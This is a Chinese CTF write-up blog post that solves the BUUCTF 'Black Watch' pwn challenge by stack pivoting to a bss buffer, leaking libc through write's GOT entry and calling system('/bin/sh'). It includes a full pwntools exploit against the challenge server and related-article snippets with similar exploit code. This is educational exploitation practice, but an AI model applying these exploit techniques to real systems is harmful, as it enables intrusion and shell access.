[BUUCTF]PWN——[Black Watch 入群题]PWN

最新推荐文章于 2024-05-11 09:52:27 发布
最新推荐文章于 2024-05-11 09:52:27 发布
阅读量2.4k 收藏 12
点赞数 10
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/109260008
版权

[Black Watch 入群题]PWN——栈劫持

入群题密码在 /password.txt
Ubuntu 16
2020年02月27日:此入群题已作废,请看新版入群题。

附件

解题步骤:

  1. 例行检查,32位程序,开启了nx保护
    在这里插入图片描述

  2. 运行一下程序,两次输入,测试时发现输入长度过长,会报错
    在这里插入图片描述

在这里插入图片描述

  1. 32位ida载入,首先shift+f12查看一下程序里的字符串,没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’)
    在这里插入图片描述
  2. 从main函数开始看程序
    在这里插入图片描述
  3. 主要部分在function函数里
    在这里插入图片描述
    在这里插入图片描述
  4. 一开始输出m1里的字符串,然后调用read函数给s写入参数,s在bss段上,而且允许我们写入0x200长度的数据,我们可以在这边写很多东西
    在这里插入图片描述
  5. 之后输出m2里的内容
    在这里插入图片描述
  6. 然后又是一个read函数,让我们读入0x20长度的数据给参数buf,ida给我们分析的buf参数的大小是0x18,我们可以溢出0x8字节,0x8字节,只够我们覆盖ret,没办法构造很长的rop链来攻击
  7. 我们之前看到的参数s,那边我们可以写入很长的数据,我们可以将我们的rop链布置在那里,由于这题需要我们自己构造system(‘/bin/sh’)
    所以我们需要先来泄露一下程序的libc版本
payload=p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
r.recvuntil("What is your name?")
r.send(payload)

现在我们布置好的s是这样的

在这里插入图片描述
简单描述一下s参数里的布局
首先写入write函数的plt表地址(write函数的实际地址),去调用write函数
接着在函数返回地址处写入main函数地址,控制程序执行流

看一下write函数原型

ssize_t write(int fd,const void*buf,size_t count);
参数说明:
  fd:是文件描述符(write所对应的是写,即就是1)
  buf:通常是一个字符串,需要写入的字符串
  count:是每次写入的字节数

最后的p32(1)+p32(write_got)+p32(4)是我们一开始写入的调用write函数的参数,目的是调用write函数去打印write的got表(write函数的地址),32位程序,一次传入4字节

这句payload会泄露程序里的write函数的地址,利用libcsearcher就能获取这个程序libc的基址,接下我们就可以构造system(‘/bin/sh’)获取shell了

  1. 现在我们要想办法去调用我们布置好的栈,上面分析了,溢出长度不够我们完成利用,这边用到了一个叫栈劫持的方法,关于栈劫持的原理,看这里,从156:14开始
    这篇文章也是讲栈劫持原理的
    做栈劫持主要用到的是一个leave;ret指令,一般程序执行完成后都会调用leave;ret来还原现场
    在这里插入图片描述
    找一下程序里的leave;ret指令,leave_ret=0x8048408
    在这里插入图片描述
payload1='a'*0x18+p32(s-4)+p32(leave_ret)

在这里插入图片描述

我们在给buf参数赋值的时候,溢出后将rbp覆写成s-4的地址,函数返回地址覆写成leave;ret指令的地址

理一下这样写程序的执行过程:
首先程序正常结束了,去调用程序本身的leave;ret来还原现场,
根据我们对栈的布局,
mov rsp,rbp->将rsp指向了rbp,栈变成了这个样子
在这里插入图片描述

pop rbp->rbp寄存器被我们设置成了参数s-4的地址,指向了我们布置好的栈上方,这边-4是因为我们第二次执行pop rbp给rbp赋值的时候,会将rsp+4,如果不减去4,rsp就在程序一开始的时候指向的不是栈顶,而是栈顶+4的位置,我们之后读取数据会丢失一开始的4字节,所以需要一开始的时候将指针往上抬4字节,栈变成了这个样子
在这里插入图片描述

ret(pop rip)->去调用leave;ret指令
再次执行leave;ret指令

mov rsp,rbp->rsp指向了参数s-4的位置,栈布局现在是这样
在这里插入图片描述

pop rbp->弹出栈顶的值给rbp,之后栈变成了这样,我们成功将esp指针劫持到了我们布置好的栈上
在这里插入图片描述

ret(pop rip)->将esp指向的输值弹给rip
接下来它就会去执行我们布置好的泄露libc的步骤,我们去接收它输出的write函数地址,就知道了libc版本,接下来就能去构造system(’/bin/sh‘)了,接下来在重复一下上述的控制流程,就能拿到shell了

(叙述的时候ebp=rbp,esp=rsp,中间说明没有保持一致,在查资料的时候,写的两个寄存器的名字不同,但都是这个作用)

完整exp:

from pwn import *
from LibcSearcher import *

#p=process('./spwn')
r=remote('node3.buuoj.cn',28433)
elf=ELF('./spwn')

write_plt=elf.plt['write']
write_got=elf.got['write']
main=0x8048513
s=0x0804A300
leave_ret=0x08048408

payload=p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
r.recvuntil("What is your name?")
r.send(payload)

payload1='a'*0x18+p32(s-4)+p32(leave_ret)
r.recvuntil("What do you want to say?")
r.send(payload1)

write_addr=u32(r.recv(4))

libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
sh=libc_base+libc.dump('str_bin_sh')

r.recvuntil("name?")
payload=p32(system)+p32(0)+p32(sh)
r.sendline(payload)

r.recvuntil("say?")
r.sendline(payload1)

r.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 10
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
专栏目录
BUUCTF:[Black Watch 群题]PWN(write up)
qq_44768749的博客
08-23 793
BUUCTF:[Black Watch 群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
[Black Watch 群题]PWN(栈迁移到bss)
qq_33590156的博客
08-04 707
from pwn import * from LibcSearcher import * context(os='linux',arch='i386',log_level='debug') ms = remote('node3.buuoj.cn',25353) #ms = process("./spwn") elf = ELF('./spwn') bss_addr = 0x0804A300 lea_ret = 0x08048408 write_plt = elf.plt['write'] write_
Black_Watch_群题_PWN
z1r0的博客
12-09 1235
Black_Watch_群题_PWN 查看保护 有溢出,长度不够,又有s可以存放payload。所以栈迁移 用ebp和esp这两个跳板,控制eip顺利执行需要的payload。 leave_ret(mov esp, ebp; pop ebp;)用这个gadgets。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug:
2024年最新CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1),学习路线+知识点梳理
最新发布
2401_84264244的博客
05-11 501
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
[Black Watch 群题]PWN-栈迁移
个人笔记
04-20 367
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出栈空间只有0x20-0x18=8字节无法构造rop,所以需要利用栈迁移技术,迁移到bss上构造rop。bss栈布局:(左边是第一泄露Libc构造栈帧,右边是第二次重写获取shell的栈帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。栈迁移操作:构造好栈中ebp新位置。思路:ret2shellcode。栈迁移关键指令:leave。
[Black Watch 群题]PWN
m0sway的博客
11-24 1360
[Black Watch 群题]PWN 使用checksec查看: 只开启了栈不可执行,拉进IDA中查看: 直接给了漏洞函数,跟进看: 变量s里面可写0x200个字符,放在bss段中。变量buf里面可写0x20个字符,但是并不能溢出。 可以联想到栈迁移的方法,将栈迁移到变量s所在的bss段中,s里面放上payload 这题没有system和/bin/sh,需要先进行libc泄露再getshell exp: from pwn import * #start r = remote("node4.b
BUUCTF】[Black Watch 群题]PWN
m0_51251108的博客
12-27 395
BUUCTF】[Black Watch 群题]PWN 记录下刷题,方便自己以后回顾,写的很烂,还请见谅 本题要用栈迁移 先checksec,file和nc看下程序 32位,动态链接,无canary和pie 思路:vul_function()里最后的read能栈溢出,但位置太短,不够写rop,运用栈迁移跳转至跳转至上一个read,写rop链,ret2libc后就能拿到shell了 主要是如何栈迁移: leave ret相当于: leave => mov esp, ebp; pop ebp
PWN · 栈迁移】[BUUCTF][Black Watch 群题]PWN
Mr_Fmnwon的博客
08-01 379
进能够覆盖ebp和ret,很难不往栈迁移上想。 修改ebp和ret后我们可以将栈指针指向另一处地址addr,需要ebp修改为ebp-4和ret修改为leave;ret地址。这是触发栈迁移的基本过程。 查看整个代码发现没有后门函数。 2.泄露libc 没有system函数的使用,但是有write函数。我们可以通过write泄露write的真实地址,从而泄露libc的地址。进一步可以拿到system和str_bin_sh的地址。 3.组合流程① read大量数据,可以是 aaaa + write.pl
BUUCTFBlack_Watch_群题_PWN2 (tcache stash unlink attack原理和例题)
xy1458214551的博客
12-25 879
BUUCTFBlackWatch群题PWN2的题解,作为经典的tcache stash unlink利用
栈溢出学习(五)之NX,ASLR绕过方法
Pz_mstr's Blog
03-29 3746
前言 栈溢出学习(五)之NX,ASLR绕过方法,讲述NX,ASLR保护机制及其绕过方法 系列文章 栈溢出学习(一)之利用预留后门 & return2shellcode 栈溢出学习(二)之 jmp esp & return2libc 栈溢出学习(三)之简单ROP 栈溢出学习(四)之Hijack GOT 本文属于新手实验难度,过程比较详细,适合新手学习 样例代码 本文使用的代码如下...
Linux Exploit系列之七 绕过 ASLR -- 第二部分
weixin_30679823的博客
05-05 161
原文地址:https://github.com/wizardforcel/sploitfun-linux-x86-exp-tut-zh/blob/master/7.md 这一节是简单暴力的一节,作者讲的很清楚,有些坑我在之前的说明中也已经说过了。这次说一个坑,我调了很久,不一定每个人都会遇到。 TypeError: execv() arg 2 must contain only strings...
一道pwn门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
pwn1 一道pwn练习题
05-07
pwn练习题
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
warmup pwn门题
02-11
pwn门题
buu [Black Watch 群题]PWN 1
weixin_74861133的博客
03-13 780
程序的逻辑是先输出一段话m1:Hello good Ctfer!再向s中输0x200的数据,再输出一段话m2:What do you want to say?然后再向buf中读0x20的数据。
ASLR/DEP绕过技术概览
Walter的专栏
09-12 4920
ASLR/DEP绕过技术概览 by WinsOn@Cybersword      在经典的栈溢出模型中,通过覆盖函数的返回地址来达到控制程序执行流程(EIP寄存器),通常将返回地址覆盖为0x7FFA4512,这个地址是一条JMP ESP指令,在函数返回时就会跳转到这个地址去执行,也就是执行JMP ESP,而此时ESP刚好指向我们在栈上布置的Shellcode,于是就执行了Shellcode。
Windows下的ASLR保护机制详解及其绕过
WdIg-2023的博客
04-09 990
我们前面已经详细介绍过GS,SafeSEH,和DEP保护机制,大家想一想,如果没有开启任何保护,如果程序存在漏洞我们是不是很容易攻击成功?就算开了前面已经介绍过的保护,我们也有很容易的方法突破这些保护,进而完成攻击。那么我们再次站在开发者的角度,我们如何制定一种保护机制,从而让攻击很难完成呢?
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值